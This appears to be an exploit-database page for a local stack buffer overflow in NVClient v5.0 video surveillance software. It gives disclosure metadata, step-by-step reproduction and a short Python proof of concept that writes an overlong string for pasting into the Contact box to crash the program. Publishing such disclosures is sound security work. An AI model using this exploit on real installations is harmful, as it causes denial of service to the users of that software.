header-logo
Suggest Exploit
vendor:
NVClient
by:
Ahmet Ümit BAYRAM
7.5
CVSS
HIGH
Buffer Overflow Local
Buffer Overflow
CWE
Product Name: NVClient
Affected Version From: 5
Affected Version To: 5
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 10 64bit
2023

NVClient v5.0 – Stack Buffer Overflow (DoS)

Stack buffer overflow vulnerability in NVClient v5.0 allows attackers to cause a denial of service (crash) via a crafted payload in the Contact box.

Mitigation:

Apply the latest patch or update to a version that is not affected.
Source

Exploit-DB raw data:

# Exploit Title: NVClient v5.0 - Stack Buffer Overflow (DoS)
# Discovered by: Ahmet Ümit BAYRAM
# Discovered Date: 2023-08-19
# Software Link: http://www.neonguvenlik.com/yuklemeler/yazilim/kst-f919-hd2004.rar
# Software Manual: http://download.eyemaxdvr.com/DVST%20ST%20SERIES/CMS/Video%20Surveillance%20Management%20Software(V5.0).pdf
# Vulnerability Type: Buffer Overflow Local
# Tested On: Windows 10 64bit
# Tested Version: 5.0


# Steps to Reproduce:
# 1- Run the python script and create exploit.txt file
# 2- Open the application and log in
# 3- Click the "Config" button in the upper menu
# 4- Click the "User" button just below it
# 5- Now click the "Add users" button in the lower left
# 6- Fill in the Username, Password, and Confirm boxes
# 7- Paste the characters from exploit.txt into the Contact box
# 8- Click OK and crash!

#!/usr/bin/env python3

exploit = 'A' * 846

try:
    with open("exploit.txt","w") as file:
        file.write(exploit)
    print("POC is created")
except:
    print("POC not created")